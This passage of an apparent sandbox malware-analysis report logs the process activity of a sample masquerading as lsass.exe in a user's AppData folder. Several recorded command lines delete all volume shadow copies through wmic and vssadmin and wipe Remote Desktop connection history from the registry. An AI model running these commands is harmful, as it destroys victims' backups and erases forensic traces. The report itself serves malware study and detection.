Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\System32\Wbem\WMIC.exe os_pid = 0xa18, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4a540000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x76c4a84f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x76c53b92 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x76c4a79d True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:26 (UTC) True 1
Fn
Get Time type = Ticks, time = 150306 True 1
Fn
Get Time type = Performance Ctr, time = 21074384517 True 1
Fn
Environment (17)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 6
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 80041014 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #18: wmic.exe
168 0
»
Information Value
ID #18
File Name c:\windows\syswow64\wbem\wmic.exe
Command Line wmic shadowcopy delete
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:30, Reason: Child Process
Unmonitor End Time: 00:01:33, Reason: Self Terminated
Monitor Duration 00:00:03
OS Process Information
»
Information Value
PID 0xa18
Parent PID 0x3d0 (c:\windows\syswow64\cmd.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A2C
0x A38
0x A3C
0x A40
0x A48
0x A28
Host Behavior
COM (7)
»
Operation Class Interface Additional Information Success Count Logfile
Create WBEMLocator IWbemLocator cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create F6D90F12-9C73-11D3-B32E-00C04F990BB4 2933BF95-7B36-11D2-B20E-00C04F983E60 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create EB87E1BD-3233-11D2-AEC9-00C04FB68820 EB87E1BC-3233-11D2-AEC9-00C04FB68820 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\cli True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\cli\ms_409 True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\XDUWTFONO\ROOT\CIMV2 True 1
Fn
Execute WBEMLocator IWbemServices method_name = ExecQuery, query_language = WQL, query = SELECT * FROM Win32_ShadowCopy False 1
Fn
Registry (5)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging, data = 48 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging Directory True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging Directory, data = 37 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Log File Max Size, data = 54 True 1
Fn
Module (3)
»
Operation Module Additional Information Success Count Logfile
Load C:\Windows\system32\kernel32.dll base_address = 0x76c20000 True 1
Fn
Get Handle c:\windows\syswow64\wbem\wmic.exe base_address = 0x290000 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x76c4a84f True 1
Fn
System (7)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = XDUWTFONO True 1
Fn
Get Time type = System Time, time = 2019-07-26 16:46:26 (UTC) True 1
Fn
Get Time type = Ticks, time = 150478 True 1
Fn
Get Time type = Performance Ctr, time = 21106089397 True 1
Fn
Get Time type = Local Time, time = 2019-07-27 02:46:26 (Local Time) True 1
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 2
Fn
Process #19: svchost.exe
0 0
»
Information Value
ID #19
File Name c:\windows\system32\svchost.exe
Command Line C:\Windows\system32\svchost.exe -k netsvcs
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:31, Reason: RPC Server
Unmonitor End Time: 00:04:20, Reason: Terminated by Timeout
Monitor Duration 00:02:49
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x36c
Parent PID 0x1cc (c:\windows\system32\services.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 8E8
0x 688
0x 910
0x BA0
0x B9C
0x B94
0x B90
0x 5B4
0x 798
0x 7F8
0x 430
0x 268
0x 764
0x 760
0x 75C
0x 70C
0x 6C8
0x 6C0
0x 6A4
0x 6A0
0x 690
0x 67C
0x 490
0x 454
0x 450
0x 428
0x 420
0x 404
0x 18C
0x F0
0x 3F0
0x 3E4
0x 398
0x 394
0x 390
0x 38C
0x 378
0x 370
0x A24
0x A64
0x A4C
0x A6C
0x 970
0x A14
0x 768
0x 7EC
0x 4A0
0x 7C4
0x 7D4
Process #21: wmiprvse.exe
0 0
»
Information Value
ID #21
File Name c:\windows\syswow64\wbem\wmiprvse.exe
Command Line C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:32, Reason: RPC Server
Unmonitor End Time: 00:04:20, Reason: Terminated by Timeout
Monitor Duration 00:02:48
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x8cc
Parent PID 0x254 (c:\windows\system32\svchost.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\Network Service
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 8C8
0x 8C4
0x 8BC
0x 8B8
0x 8B4
0x 8B0
0x 8AC
0x 974
0x 83C
Process #22: vssvc.exe
3 0
»
Information Value
ID #22
File Name c:\windows\system32\vssvc.exe
Command Line C:\Windows\system32\vssvc.exe
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:33, Reason: RPC Server
Unmonitor End Time: 00:01:47, Reason: Self Terminated
Monitor Duration 00:00:14
OS Process Information
»
Information Value
PID 0x8a8
Parent PID 0x1cc (c:\windows\system32\services.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 888
0x 88C
0x 890
0x 894
0x 898
0x 89C
0x 8A4
0x 87C
0x 980
Host Behavior
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:27 (UTC) True 1
Fn
Get Time type = Ticks, time = 151913 True 1
Fn
Get Time type = Performance Ctr, time = 21357333144 True 1
Fn
Process #23: cmd.exe
58 0
»
Information Value
ID #23
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:33, Reason: Child Process
Unmonitor End Time: 00:01:34, Reason: Self Terminated
Monitor Duration 00:00:00
OS Process Information
»
Information Value
PID 0x878
Parent PID 0xc4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 874
Host Behavior
File (10)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\vssadmin.exe os_pid = 0x860, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4a250000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x76c4a84f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x76c53b92 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x76c4a79d True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:28 (UTC) True 1
Fn
Get Time type = Ticks, time = 152147 True 1
Fn
Get Time type = Performance Ctr, time = 21381272517 True 1
Fn
Environment (17)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 6
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000002 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #24: vssadmin.exe
0 0
»
Information Value
ID #24
File Name c:\windows\syswow64\vssadmin.exe
Command Line vssadmin delete shadows /all /quiet
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:33, Reason: Child Process
Unmonitor End Time: 00:01:34, Reason: Self Terminated
Monitor Duration 00:00:01
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x860
Parent PID 0x878 (c:\windows\syswow64\cmd.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 85C
0x 858
0x 854
0x 850
0x 84C
Process #25: cmd.exe
58 0
»
Information Value
ID #25
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\system32\cmd.exe" /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:33, Reason: Child Process
Unmonitor End Time: 00:01:34, Reason: Self Terminated
Monitor Duration 00:00:00
OS Process Information
»
Information Value
PID 0x844
Parent PID 0xc4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 840
Host Behavior
File (10)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\reg.exe os_pid = 0x82c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4a630000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x76c4a84f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x76c53b92 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x76c4a79d True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:28 (UTC) True 1
Fn
Get Time type = Ticks, time = 152631 True 1
Fn
Get Time type = Performance Ctr, time = 21438125770 True 1
Fn
Environment (17)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 6
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000001 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #26: reg.exe
42 0
»
Information Value
ID #26
File Name c:\windows\syswow64\reg.exe
Command Line reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:34, Reason: Child Process
Unmonitor End Time: 00:01:34, Reason: Self Terminated
Monitor Duration 00:00:00
OS Process Information
»
Information Value
PID 0x82c
Parent PID 0x844 (c:\windows\syswow64\cmd.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 828
Host Behavior
File (10)
»
Operation Filename Additional Information Success Count Logfile
Get Info STD_ERROR_HANDLE type = file_type True 2
Fn
Open STD_ERROR_HANDLE - True 6
Fn
Write STD_ERROR_HANDLE size = 7 True 1
Fn
Data
Write STD_ERROR_HANDLE size = 67 True 1
Fn
Data
Registry (2)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default - False 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\reg.exe base_address = 0xb60000 True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:28 (UTC) True 1
Fn
Get Time type = Ticks, time = 152709 True 1
Fn
Get Time type = Performance Ctr, time = 21446666841 True 1
Fn
Process #27: cmd.exe
58 0
»
Information Value
ID #27
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\system32\cmd.exe" /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:34, Reason: Child Process
Unmonitor End Time: 00:01:34, Reason: Self Terminated
Monitor Duration 00:00:00
OS Process Information
»
Information Value
PID 0x824
Parent PID 0xc4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 820
Host Behavior
File (10)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\reg.exe os_pid = 0xb18, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x49f00000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x76c4a84f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x76c53b92 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x76c4a79d True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:46:28 (UTC) True 1
Fn
Get Time type = Ticks, time = 152834 True 1
Fn
Get Time type = Performance Ctr, time = 21459776815 True 1
Fn
Environment (17)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 6
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000001 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #28: reg.exe
42 0
»
Information Value
ID #28
File Name c:\windows\syswow64\reg.exe
Command Line reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:34, Reason: Child Process
Unmonitor End Time: 00:01:34, Reason: Self Terminated
Monitor Duration 00:00:00
OS Process Information
»
Information Value
PID 0xb18
Parent PID 0x824 (c:\windows\syswow64\cmd.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
